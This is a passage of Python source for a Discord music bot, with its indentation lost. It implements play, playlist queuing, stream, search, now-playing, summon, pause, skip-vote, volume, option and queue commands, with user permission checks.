and permissions.extractors
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-badextractor",
"You do not have permission to play media from this service.",
),
expire_in=30,
)
# abstract the search handling away from the user
# our ytdl options allow us to use search strings as input urls
if info.get("url", "").startswith("ytsearch"):
# print("[Command:play] Searching for \"%s\"" % song_url)
if info_process:
info = info_process
else:
await self.safe_send_message(
channel, "```\n%s\n```" % info_process_err, expire_in=120
)
raise exceptions.CommandError(
self.str.get(
"cmd-play-nodata",
"Error extracting info from search string, youtubedl returned no data. "
"You may need to restart the bot if this continues to happen.",
),
expire_in=30,
)
song_url = info_process.get("webpage_url", None) or info_process.get(
"url", None
)
if "entries" in info:
# if entry is playlist then only get the first one
song_url = info["entries"][0]["webpage_url"]
info = info["entries"][0]
# If it's playlist
if "entries" in info:
await self._do_playlist_checks(
permissions, player, author, info["entries"]
)
num_songs = sum(1 for _ in info["entries"])
if info["extractor"].lower() in [
"youtube:playlist",
"soundcloud:set",
"bandcamp:album",
]:
try:
return await self._cmd_play_playlist_async(
player,
channel,
author,
permissions,
song_url,
info["extractor"],
)
except exceptions.CommandError:
raise
except Exception as e:
log.error("Error queuing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-error",
"Error queuing playlist:\n`{0}`",
).format(e),
expire_in=30,
)
t0 = time.time()
# My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
# monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
# I don't think we can hook into it anyways, so this will have to do.
# It would probably be a thread to check a few playlists and get the speed from that
# Different playlists might download at different speeds though
wait_per_song = 1.2
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-playlist-gathering-1",
"Gathering playlist information for {0} songs{1}",
).format(
num_songs,
self.str.get(
"cmd-play-playlist-gathering-2", ", ETA: {0} seconds"
).format(fixg(num_songs * wait_per_song))
if num_songs >= 10
else ".",
),
)
# We don't have a pretty way of doing this yet. We need either a loop
# that sends these every 10 seconds or a nice context manager.
await self.send_typing(channel)
# TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
# Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
entry_list, position = await player.playlist.import_from(
song_url, channel=channel, author=author, head=False
)
tnow = time.time()
ttime = tnow - t0
listlen = len(entry_list)
drop_count = 0
if permissions.max_song_length:
for e in entry_list.copy():
if e.duration > permissions.max_song_length:
player.playlist.entries.remove(e)
entry_list.remove(e)
drop_count += 1
# Im pretty sure there's no situation where this would ever break
# Unless the first entry starts being played, which would make this a race condition
if drop_count:
print("Dropped %s songs" % drop_count)
log.info(
"Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
listlen,
fixg(ttime),
ttime / listlen if listlen else 0,
ttime / listlen - wait_per_song
if listlen - wait_per_song
else 0,
fixg(wait_per_song * num_songs),
)
)
await self.safe_delete_message(procmesg)
if not listlen - drop_count:
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-maxduration",
"No songs were added, all songs were over max duration (%ss)",
)
% permissions.max_song_length,
expire_in=30,
)
reply_text = self.str.get(
"cmd-play-playlist-reply",
"Enqueued **%s** songs to be played. Position in queue: %s",
)
btext = str(listlen - drop_count)
# If it's an entry
else:
# youtube:playlist extractor but it's actually an entry
if info.get("extractor", "").startswith("youtube:playlist"):
try:
info = await self.downloader.extract_info(
player.playlist.loop,
"https://www.youtube.com/watch?v=%s" % info.get("url", ""),
download=False,
process=False,
)
except Exception as e:
raise exceptions.CommandError(e, expire_in=30)
if (
permissions.max_song_length
and info.get("duration", 0) > permissions.max_song_length
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-song-limit",
"Song duration exceeds limit ({0} > {1})",
).format(info["duration"], permissions.max_song_length),
expire_in=30,
)
entry, position = await player.playlist.add_entry(
song_url, channel=channel, author=author, head=head
)
reply_text = self.str.get(
"cmd-play-song-reply",
"Enqueued `%s` to be played. Position in queue: %s",
)
btext = entry.title
if position == 1 and player.is_stopped:
position = self.str.get("cmd-play-next", "Up next!")
reply_text %= (btext, position)
else:
reply_text %= (btext, position)
try:
time_until = await player.playlist.estimate_time_until(
position, player
)
reply_text += self.str.get(
"cmd-play-eta", " - estimated time until playing: %s"
) % ftimedelta(time_until)
except exceptions.InvalidDataError:
reply_text += self.str.get(
"cmd-play-eta-error", " - cannot estimate time until playing"
)
except:
traceback.print_exc()
return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(
self, player, channel, author, permissions, playlist_url, extractor_type
):
"""
Secret handler to use the async wizardry to make playlist queuing non-"blocking"
"""
await self.send_typing(channel)
info = await self.downloader.extract_info(
player.playlist.loop, playlist_url, download=False, process=False
)
if not info:
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-invalid", "That playlist cannot be played."
)
)
num_songs = sum(1 for _ in info["entries"])
t0 = time.time()
busymsg = await self.safe_send_message(
channel,
self.str.get("cmd-play-playlist-process", "Processing {0} songs...").format(
num_songs
),
) # TODO: From playlist_title
await self.send_typing(channel)
entries_added = 0
if extractor_type == "youtube:playlist":
try:
entries_added = await player.playlist.async_process_youtube_playlist(
playlist_url, channel=channel, author=author
)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-queueerror",
"Error handling playlist {0} queuing.",
).format(playlist_url),
expire_in=30,
)
elif extractor_type.lower() in ["soundcloud:set", "bandcamp:album"]:
try:
entries_added = await player.playlist.async_process_sc_bc_playlist(
playlist_url, channel=channel, author=author
)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-queueerror",
"Error handling playlist {0} queuing.",
).format(playlist_url),
expire_in=30,
)
songs_processed = len(entries_added)
drop_count = 0
skipped = False
if permissions.max_song_length:
for e in entries_added.copy():
if e.duration > permissions.max_song_length:
try:
player.playlist.entries.remove(e)
entries_added.remove(e)
drop_count += 1
except:
pass
if drop_count:
log.debug("Dropped %s songs" % drop_count)
if (
player.current_entry
and player.current_entry.duration > permissions.max_song_length
):
await self.safe_delete_message(
self.server_specific_data[channel.guild]["last_np_msg"]
)
self.server_specific_data[channel.guild]["last_np_msg"] = None
skipped = True
player.skip()
entries_added.pop()
await self.safe_delete_message(busymsg)
songs_added = len(entries_added)
tnow = time.time()
ttime = tnow - t0
wait_per_song = 1.2
# TODO: actually calculate wait per song in the process function and return that too
# This is technically inaccurate since bad songs are ignored but still take up time
log.info(
"Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
songs_processed,
num_songs,
fixg(ttime),
ttime / num_songs if num_songs else 0,
ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
fixg(wait_per_song * num_songs),
)
)
if not songs_added:
basetext = (
self.str.get(
"cmd-play-playlist-maxduration",
"No songs were added, all songs were over max duration (%ss)",
)
% permissions.max_song_length
)
if skipped:
basetext += self.str.get(
"cmd-play-playlist-skipped",
"\nAdditionally, the current song was skipped for being too long.",
)
raise exceptions.CommandError(basetext, expire_in=30)
return Response(
self.str.get(
"cmd-play-playlist-reply-secs",
"Enqueued {0} songs to be played in {1} seconds",
).format(songs_added, fixg(ttime, 1)),
delete_after=30,
)
async def cmd_stream(self, _player, channel, author, permissions, song_url):
"""
Usage:
{command_prefix}stream song_link
Enqueue a media stream.
This could mean an actual stream like Twitch or shoutcast, or simply streaming
media without predownloading it. Note: FFmpeg is notoriously bad at handling
streams, especially on poor connections. You have been warned.
"""
if _player:
player = _player
elif permissions.summonplay:
vc = author.voice.channel if author.voice else None
response = await self.cmd_summon(
channel, channel.guild, author, vc
) # @TheerapakG: As far as I know voice_channel param is unused
if self.config.embeds:
content = self._gen_embed()
content.title = "summon"
content.description = response.content
else:
content = response.content
await self.safe_send_message(
channel,
content,
expire_in=response.delete_after if self.config.delete_messages else 0,
)
player = self.get_player_in(channel.guild)
if not player:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
song_url = song_url.strip("<>")
if (
permissions.max_songs
and player.playlist.count_for_user(author) >= permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-stream-limit",
"You have reached your enqueued song limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when its disabled!",
),
expire_in=30,
)
await self.send_typing(channel)
await player.playlist.add_stream_entry(song_url, channel=channel, author=author)
return Response(
self.str.get("cmd-stream-success", "Streaming."), delete_after=6
)
async def cmd_search(
self, message, player, channel, author, permissions, leftover_args
):
"""
Usage:
{command_prefix}search [service] [number] query
Searches a service for a video and adds it to the queue.
- service: any one of the following services:
- youtube (yt) (default if unspecified)
- soundcloud (sc)
- yahoo (yh)
- number: return a number of video results and waits for user to choose one
- defaults to 3 if unspecified
- note: If your search query starts with a number,
you must put your query in quotes
- ex: {command_prefix}search 2 "I ran seagulls"
The command issuer can use reactions to indicate their response to each result.
"""
if (
permissions.max_songs
and player.playlist.count_for_user(author) > permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-search-limit",
"You have reached your playlist item limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when its disabled!",
),
expire_in=30,
)
def argcheck():
if not leftover_args:
# noinspection PyUnresolvedReferences
raise exceptions.CommandError(
self.str.get(
"cmd-search-noquery", "Please specify a search query.\n%s"
)
% dedent(
self.cmd_search.__doc__.format(
command_prefix=self.config.command_prefix
)
),
expire_in=60,
)
argcheck()
try:
leftover_args = shlex.split(" ".join(leftover_args))
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-search-noquote", "Please quote your search query properly."
),
expire_in=30,
)
service = "youtube"
items_requested = self.config.defaultsearchresults
max_items = permissions.max_search_items
services = {
"youtube": "ytsearch",
"soundcloud": "scsearch",
"yahoo": "yvsearch",
"yt": "ytsearch",
"sc": "scsearch",
"yh": "yvsearch",
}
if leftover_args[0] in services:
service = leftover_args.pop(0)
argcheck()
if leftover_args[0].isdigit():
items_requested = int(leftover_args.pop(0))
argcheck()
if items_requested > max_items:
raise exceptions.CommandError(
self.str.get(
"cmd-search-searchlimit",
"You cannot search for more than %s videos",
)
% max_items
)
# Look jake, if you see this and go "what the fuck are you doing"
# and have a better idea on how to do this, i'd be delighted to know.
# I don't want to just do ' '.join(leftover_args).strip("\"'")
# Because that eats both quotes if they're there
# where I only want to eat the outermost ones
if leftover_args[0][0] in "'\"":
lchar = leftover_args[0][0]
leftover_args[0] = leftover_args[0].lstrip(lchar)
leftover_args[-1] = leftover_args[-1].rstrip(lchar)
search_query = "%s%s:%s" % (
services[service],
items_requested,
" ".join(leftover_args),
)
search_msg = await self.safe_send_message(
channel, self.str.get("cmd-search-searching", "Searching for videos...")
)
await self.send_typing(channel)
try:
info = await self.downloader.extract_info(
player.playlist.loop, search_query, download=False, process=True
)
except Exception as e:
await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
return
else:
await self.safe_delete_message(search_msg)
if not info:
return Response(
self.str.get("cmd-search-none", "No videos found."), delete_after=30
)
# Decide if the list approach or the reaction approach should be used
if self.config.searchlist:
result_message_array = []
if self.config.embeds:
content = self._gen_embed()
content.title = self.str.get(
"cmd-search-title", "{0} search results:"
).format(service.capitalize())
content.description = "To select a song, type the corresponding number"
else:
result_header = self.str.get(
"cmd-search-title", "{0} search results:"
).format(service.capitalize())
result_header += "\n\n"
for e in info["entries"]:
# This formats the results and adds it to an array
# format_song_duration removes the hour section
# if the song is shorter than an hour
result_message_array.append(
self.str.get(
"cmd-search-list-entry", "**{0}**. **{1}** | {2}"
).format(
info["entries"].index(e) + 1,
e["title"],
format_song_duration(
ftimedelta(timedelta(seconds=e["duration"]))
),
)
)
# This combines the formatted result strings into one list.
result_string = "\n".join(
"{0}".format(result) for result in result_message_array
)
result_string += "\n**0.** Cancel"
if self.config.embeds:
# Add the result entries to the embedded message and send it to the channel
content.add_field(
name=self.str.get("cmd-search-field-name", "Pick a song"),
value=result_string,
inline=False,
)
result_message = await self.safe_send_message(channel, content)
else:
# Construct the complete message and send it to the channel.
result_string = result_header + result_string
result_string += "\n\nSelect song by typing the corresponding number or type cancel to cancel search"
result_message = await self.safe_send_message(
channel,
self.str.get("cmd-search-result-list-noembed", "{0}").format(
result_string
),
)
# Check to verify that recived message is valid.
def check(reply):
return (
reply.channel.id == channel.id
and reply.author == message.author
and reply.content.isdigit()
and -1 <= int(reply.content) - 1 <= len(info["entries"])
)
# Wait for a response from the author.
try:
choice = await self.wait_for("message", timeout=30.0, check=check)
except asyncio.TimeoutError:
await self.safe_delete_message(result_message)
return
if choice.content == "0":
# Choice 0 will cancel the search
if self.config.delete_invoking:
await self.safe_delete_message(choice)
await self.safe_delete_message(result_message)
else:
# Here we have a valid choice lets queue it.
if self.config.delete_invoking:
await self.safe_delete_message(choice)
await self.safe_delete_message(result_message)
await self.cmd_play(
message,
player,
channel,
author,
permissions,
[],
info["entries"][int(choice.content) - 1]["webpage_url"],
)
if self.config.embeds:
return Response(
self.str.get(
"cmd-search-accept-list-embed", "[{0}]({1}) added to queue"
).format(
info["entries"][int(choice.content) - 1]["title"],
info["entries"][int(choice.content) - 1]["webpage_url"],
),
delete_after=30,
)
else:
return Response(
self.str.get(
"cmd-search-accept-list-noembed", "{0} added to queue"
).format(info["entries"][int(choice.content) - 1]["title"]),
delete_after=30,
)
else:
# Original code
for e in info["entries"]:
result_message = await self.safe_send_message(
channel,
self.str.get("cmd-search-result", "Result {0}/{1}: {2}").format(
info["entries"].index(e) + 1,
len(info["entries"]),
e["webpage_url"],
),
)
def check(reaction, user):
return (
user == message.author
and reaction.message.id == result_message.id
) # why can't these objs be compared directly?
reactions = ["\u2705", "\U0001F6AB", "\U0001F3C1"]
for r in reactions:
await result_message.add_reaction(r)
try:
reaction, user = await self.wait_for(
"reaction_add", timeout=30.0, check=check
)
except asyncio.TimeoutError:
await self.safe_delete_message(result_message)
return
if str(reaction.emoji) == "\u2705": # check
await self.safe_delete_message(result_message)
await self.cmd_play(
message,
player,
channel,
author,
permissions,
[],
e["webpage_url"],
)
return Response(
self.str.get("cmd-search-accept", "Alright, coming right up!"),
delete_after=30,
)
elif str(reaction.emoji) == "\U0001F6AB": # cross
await self.safe_delete_message(result_message)
else:
await self.safe_delete_message(result_message)
return Response(
self.str.get("cmd-search-decline", "Oh well :("), delete_after=30
)
async def cmd_np(self, player, channel, guild, message):
"""
Usage:
{command_prefix}np
Displays the current song in chat.
"""
if player.current_entry:
if self.server_specific_data[guild]["last_np_msg"]:
await self.safe_delete_message(
self.server_specific_data[guild]["last_np_msg"]
)
self.server_specific_data[guild]["last_np_msg"] = None
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = (
ftimedelta(timedelta(seconds=player.current_entry.duration))
if player.current_entry.duration != None
else "(no duration data)"
)
streaming = isinstance(player.current_entry, StreamPlaylistEntry)
prog_str = (
"`[{progress}]`" if streaming else "`[{progress}/{total}]`"
).format(progress=song_progress, total=song_total)
prog_bar_str = ""
# percentage shows how much of the current song has already been played
percentage = 0.0
if player.current_entry.duration and player.current_entry.duration > 0:
percentage = player.progress / player.current_entry.duration
# create the actual bar
progress_bar_length = 30
for i in range(progress_bar_length):
if percentage < 1 / progress_bar_length * i:
prog_bar_str += "□"
else:
prog_bar_str += "■"
action_text = (
self.str.get("cmd-np-action-streaming", "Streaming")
if streaming
else self.str.get("cmd-np-action-playing", "Playing")
)
if player.current_entry.meta.get(
"channel", False
) and player.current_entry.meta.get("author", False):
np_text = self.str.get(
"cmd-np-reply-author",
"Now {action}: **{title}** added by **{author}**\nProgress: {progress_bar} {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>",
).format(
action=action_text,
title=player.current_entry.title,
author=player.current_entry.meta["author"].name,
progress_bar=prog_bar_str,
progress=prog_str,
url=player.current_entry.url,
)
else:
np_text = self.str.get(
"cmd-np-reply-noauthor",
"Now {action}: **{title}**\nProgress: {progress_bar} {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>",
).format(
action=action_text,
title=player.current_entry.title,
progress_bar=prog_bar_str,
progress=prog_str,
url=player.current_entry.url,
)
self.server_specific_data[guild][
"last_np_msg"
] = await self.safe_send_message(channel, np_text)
await self._manual_delete_check(message)
else:
return Response(
self.str.get(
"cmd-np-none",
"There are no songs queued! Queue something with {0}play.",
).format(self.config.command_prefix),
delete_after=30,
)
async def cmd_summon(self, channel, guild, author, voice_channel):
"""
Usage:
{command_prefix}summon
Call the bot to the summoner's voice channel.
"""
# @TheerapakG: Maybe summon should have async lock?
if not author.voice:
raise exceptions.CommandError(
self.str.get(
"cmd-summon-novc",
"You are not connected to voice. Try joining a voice channel!",
)
)
voice_client = self.voice_client_in(guild)
if voice_client and guild == author.voice.channel.guild:
await voice_client.move_to(author.voice.channel)
else:
# move to _verify_vc_perms?
chperms = author.voice.channel.permissions_for(guild.me)
if not chperms.connect:
log.warning(
"Cannot join channel '{0}', no permission.".format(
author.voice.channel.name
)
)
raise exceptions.CommandError(
self.str.get(
"cmd-summon-noperms-connect",
"Cannot join channel `{0}`, no permission to connect.",
).format(author.voice.channel.name),
expire_in=25,
)
elif not chperms.speak:
log.warning(
"Cannot join channel '{0}', no permission to speak.".format(
author.voice.channel.name
)
)
raise exceptions.CommandError(
self.str.get(
"cmd-summon-noperms-speak",
"Cannot join channel `{0}`, no permission to speak.",
).format(author.voice.channel.name),
expire_in=25,
)
player = await self.get_player(
author.voice.channel,
create=True,
deserialize=self.config.persistent_queue,
)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
log.info("Joining {0.guild.name}/{0.name}".format(author.voice.channel))
return Response(
self.str.get("cmd-summon-reply", "Connected to `{0.name}`").format(
author.voice.channel
)
)
async def cmd_pause(self, player):
"""
Usage:
{command_prefix}pause
Pauses playback of the current song.
"""
if player.is_playing:
player.pause()
return Response(
self.str.get("cmd-pause-reply", "Paused music in `{0.name}`").format(
player.voice_client.channel
)
)
else:
raise exceptions.CommandError(
self.str.get("cmd-pause-none", "Player is not playing."), expire_in=30
)
async def cmd_resume(self, player):
"""
Usage:
{command_prefix}resume
Resumes playback of a paused song.
"""
if player.is_paused:
player.resume()
return Response(
self.str.get("cmd-resume-reply", "Resumed music in `{0.name}`").format(
player.voice_client.channel
),
delete_after=15,
)
elif player.is_stopped and player.playlist:
player.play()
else:
raise exceptions.CommandError(
self.str.get("cmd-resume-none", "Player is not paused."), expire_in=30
)
async def cmd_shuffle(self, channel, player):
"""
Usage:
{command_prefix}shuffle
Shuffles the server's queue.
"""
player.playlist.shuffle()
cards = [
"\N{BLACK SPADE SUIT}",
"\N{BLACK CLUB SUIT}",
"\N{BLACK HEART SUIT}",
"\N{BLACK DIAMOND SUIT}",
]
random.shuffle(cards)
hand = await self.safe_send_message(channel, " ".join(cards))
await asyncio.sleep(0.6)
for x in range(4):
random.shuffle(cards)
await self.safe_edit_message(hand, " ".join(cards))
await asyncio.sleep(0.6)
await self.safe_delete_message(hand, quiet=True)
return Response(
self.str.get("cmd-shuffle-reply", "Shuffled `{0}`'s queue.").format(
player.voice_client.channel.guild
),
delete_after=15,
)
async def cmd_clear(self, player, author):
"""
Usage:
{command_prefix}clear
Clears the playlist.
"""
player.playlist.clear()
return Response(
self.str.get("cmd-clear-reply", "Cleared `{0}`'s queue").format(
player.voice_client.channel.guild
),
delete_after=20,
)
async def cmd_remove(
self, user_mentions, message, author, permissions, channel, player, index=None
):
"""
Usage:
{command_prefix}remove [# in queue]
Removes queued songs. If a number is specified, removes that song in the queue, otherwise removes the most recently queued song.
"""
if not player.playlist.entries:
raise exceptions.CommandError(
self.str.get("cmd-remove-none", "There's nothing to remove!"),
expire_in=20,
)
if user_mentions:
for user in user_mentions:
if permissions.remove or author == user:
try:
entry_indexes = [
e
for e in player.playlist.entries
if e.meta.get("author", None) == user
]
for entry in entry_indexes:
player.playlist.entries.remove(entry)
entry_text = "%s " % len(entry_indexes) + "item"
if len(entry_indexes) > 1:
entry_text += "s"
return Response(
self.str.get(
"cmd-remove-reply", "Removed `{0}` added by `{1}`"
)
.format(entry_text, user.name)
.strip()
)
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-remove-missing",
"Nothing found in the queue from user `%s`",
)
% user.name,
expire_in=20,
)
raise exceptions.PermissionsError(
self.str.get(
"cmd-remove-noperms",
"You do not have the valid permissions to remove that entry from the queue, make sure you're the one who queued it or have instant skip permissions",
),
expire_in=20,
)
if not index:
index = len(player.playlist.entries)
try:
index = int(index)
except (TypeError, ValueError):
raise exceptions.CommandError(
self.str.get(
"cmd-remove-invalid",
"Invalid number. Use {}queue to find queue positions.",
).format(self.config.command_prefix),
expire_in=20,
)
if index > len(player.playlist.entries):
raise exceptions.CommandError(
self.str.get(
"cmd-remove-invalid",
"Invalid number. Use {}queue to find queue positions.",
).format(self.config.command_prefix),
expire_in=20,
)
if permissions.remove or author == player.playlist.get_entry_at_index(
index - 1
).meta.get("author", None):
entry = player.playlist.delete_entry_at_index((index - 1))
await self._manual_delete_check(message)
if entry.meta.get("channel", False) and entry.meta.get("author", False):
return Response(
self.str.get(
"cmd-remove-reply-author", "Removed entry `{0}` added by `{1}`"
)
.format(entry.title, entry.meta["author"].name)
.strip()
)
else:
return Response(
self.str.get("cmd-remove-reply-noauthor", "Removed entry `{0}`")
.format(entry.title)
.strip()
)
else:
raise exceptions.PermissionsError(
self.str.get(
"cmd-remove-noperms",
"You do not have the valid permissions to remove that entry from the queue, make sure you're the one who queued it or have instant skip permissions",
),
expire_in=20,
)
async def cmd_skip(
self, player, channel, author, message, permissions, voice_channel, param=""
):
"""
Usage:
{command_prefix}skip [force/f]
Skips the current song when enough votes are cast.
Owners and those with the instaskip permission can add 'force' or 'f' after the command to force skip.
"""
if player.is_stopped:
raise exceptions.CommandError(
self.str.get("cmd-skip-none", "Can't skip! The player is not playing!"),
expire_in=20,
)
if not player.current_entry:
if player.playlist.peek():
if player.playlist.peek()._is_downloading:
return Response(
self.str.get(
"cmd-skip-dl",
"The next song (`%s`) is downloading, please wait.",
)
% player.playlist.peek().title
)
elif player.playlist.peek().is_downloaded:
print("The next song will be played shortly. Please wait.")
else:
print(
"Something odd is happening. "
"You might want to restart the bot if it doesn't start working."
)
else:
print(
"Something strange is happening. "
"You might want to restart the bot if it doesn't start working."
)
current_entry = player.current_entry
permission_force_skip = permissions.instaskip or (
self.config.allow_author_skip
and author == player.current_entry.meta.get("author", None)
)
force_skip = param.lower() in ["force", "f"]
if permission_force_skip and (force_skip or self.config.legacy_skip):
player.skip() # TODO: check autopause stuff here
await self._manual_delete_check(message)
return Response(
self.str.get("cmd-skip-force", "Force skipped `{}`.").format(
current_entry.title
),
reply=True,
delete_after=30,
)
if not permission_force_skip and force_skip:
raise exceptions.PermissionsError(
self.str.get(
"cmd-skip-force-noperms",
"You do not have permission to force skip.",
),
expire_in=30,
)
# TODO: ignore person if they're deaf or take them out of the list or something?
# Currently is recounted if they vote, deafen, then vote
num_voice = sum(
1
for m in voice_channel.members
if not (m.voice.deaf or m.voice.self_deaf or m == self.user)
)
if num_voice == 0:
num_voice = 1 # incase all users are deafened, to avoid divison by zero
num_skips = player.skip_state.add_skipper(author.id, message)
skips_remaining = (
min(
self.config.skips_required,
math.ceil(
self.config.skip_ratio_required / (1 / num_voice)
), # Number of skips from config ratio
)
- num_skips
)
if skips_remaining <= 0:
player.skip() # check autopause stuff here
# @TheerapakG: Check for pausing state in the player.py make more sense
return Response(
self.str.get(
"cmd-skip-reply-skipped-1",
"Your skip for `{0}` was acknowledged.\nThe vote to skip has been passed.{1}",
).format(
current_entry.title,
self.str.get("cmd-skip-reply-skipped-2", " Next song coming up!")
if player.playlist.peek()
else "",
),
reply=True,
delete_after=20,
)
else:
# TODO: When a song gets skipped, delete the old x needed to skip messages
return Response(
self.str.get(
"cmd-skip-reply-voted-1",
"Your skip for `{0}` was acknowledged.\n**{1}** more {2} required to vote to skip this song.",
).format(
current_entry.title,
skips_remaining,
self.str.get("cmd-skip-reply-voted-2", "person is")
if skips_remaining == 1
else self.str.get("cmd-skip-reply-voted-3", "people are"),
),
reply=True,
delete_after=20,
)
async def cmd_volume(self, message, player, new_volume=None):
"""
Usage:
{command_prefix}volume (+/-)[volume]
Sets the playback volume. Accepted values are from 1 to 100.
Putting + or - before the volume will make the volume change relative to the current volume.
"""
if not new_volume:
return Response(
self.str.get("cmd-volume-current", "Current volume: `%s%%`")
% int(player.volume * 100),
reply=True,
delete_after=20,
)
relative = False
if new_volume[0] in "+-":
relative = True
try:
new_volume = int(new_volume)
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-invalid", "`{0}` is not a valid number"
).format(new_volume),
expire_in=20,
)
vol_change = None
if relative:
vol_change = new_volume
new_volume += player.volume * 100
old_volume = int(player.volume * 100)
if 0 < new_volume <= 100:
player.volume = new_volume / 100.0
return Response(
self.str.get("cmd-volume-reply", "Updated volume from **%d** to **%d**")
% (old_volume, new_volume),
reply=True,
delete_after=20,
)
else:
if relative:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-unreasonable-relative",
"Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.",
).format(
old_volume,
vol_change,
old_volume + vol_change,
1 - old_volume,
100 - old_volume,
),
expire_in=20,
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-unreasonable-absolute",
"Unreasonable volume provided: {}%. Provide a value between 1 and 100.",
).format(new_volume),
expire_in=20,
)
@owner_only
async def cmd_option(self, player, option, value):
"""
Usage:
{command_prefix}option [option] [on/y/enabled/off/n/disabled]
Changes a config option without restarting the bot. Changes aren't permanent and
only last until the bot is restarted. To make permanent changes, edit the
config file.
Valid options:
autoplaylist, save_videos, now_playing_mentions, auto_playlist_random, auto_pause,
delete_messages, delete_invoking, write_current_song
For information about these options, see the option's comment in the config file.
"""
option = option.lower()
value = value.lower()
bool_y = ["on", "y", "enabled"]
bool_n = ["off", "n", "disabled"]
generic = [
"save_videos",
"now_playing_mentions",
"auto_playlist_random",
"auto_pause",
"delete_messages",
"delete_invoking",
"write_current_song",
] # these need to match attribute names in the Config class
if option in ["autoplaylist", "auto_playlist"]:
if value in bool_y:
if self.config.auto_playlist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-enabled",
"The autoplaylist is already enabled!",
)
)
else:
if not self.autoplaylist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-none",
"There are no entries in the autoplaylist file.",
)
)
self.config.auto_playlist = True
await self.on_player_finished_playing(player)
elif value in bool_n:
if not self.config.auto_playlist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-disabled",
"The autoplaylist is already disabled!",
)
)
else:
self.config.auto_playlist = False
else:
raise exceptions.CommandError(
self.str.get(
"cmd-option-invalid-value", "The value provided was not valid."
)
)
return Response(
"The autoplaylist is now "
+ ["disabled", "enabled"][self.config.auto_playlist]
+ "."
)
else:
is_generic = [
o for o in generic if o == option
] # check if it is a generic bool option
if is_generic and (value in bool_y or value in bool_n):
name = is_generic[0]
log.debug("Setting attribute {0}".format(name))
setattr(
self.config, name, True if value in bool_y else False
) # this is scary but should work
attr = getattr(self.config, name)
res = (
"The option {0} is now ".format(option)
+ ["disabled", "enabled"][attr]
+ "."
)
log.warning("Option overriden for this session: {0}".format(res))
return Response(res)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-option-invalid-param",
"The parameters provided were invalid.",
)
)
async def cmd_queue(self, channel, player):
"""
Usage:
{command_prefix}queue
Prints the current song queue.
"""
lines = []
unlisted = 0
andmoretext = "* ... and %s more*" % ("x" * len(player.playlist.entries))
if player.is_playing:
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = (
ftimedelta(timedelta(seconds=player.current_entry.duration))
if player.current_entry.duration != None
else "(no duration data)"
)
prog_str = "`[%s/%s]`" % (song_progress, song_total)
if player.current_entry.meta.get(
"channel", False
) and player.current_entry.meta.get("author", False):
lines.append(
self.str.get(
"cmd-queue-playing-author",
"Currently playing: `{0}` added by `{1}` {2}\n",
).format(
player.current_entry.title,
player.current_entry.meta["author"].name,
prog_str,
)
)
else:
lines.append(
self.str.get(
"cmd-queue-playing-noauthor", "Currently playing: `{0}` {1}\n"
).format(player.current_entry.title, prog_str)
)
for i, item in enumerate(player.playlist, 1):
if item.meta.get("channel", False) and item.meta.get("author", False):
nextline = (
self.str.get("cmd-queue-entry-author", "{0} -- `{1}` by `{2}`")
.format(i, item.title, item.meta["author"].name)
.strip()
)
else:
nextline = (
self.str.get("cmd-queue-entry-noauthor", "{0} -- `{1}`")
.format(i, item.title)
.strip()
)
currentlinesum = sum(len(x) + 1 for x in lines) # +1 is for newline char
if (
currentlinesum + len(nextline) + len(andmoretext)
> DISCORD_MSG_CHAR_LIMIT
) or (i > self.config.queue_length):
if currentlinesum + len(andmoretext):
unlisted += 1
continue
lines.append(nextline)
if unlisted:
lines.append(self.str.get("cmd-queue-more", "\n... and %s more") % unlisted)
if not lines:
lines.append(
self.str.get(
"cmd-queue-none",
"There are no songs queued! Queue something with {}play.",
).format(self.config.command_prefix)
)
message = "\n".join(lines)
return Response(message, delete_after=30)
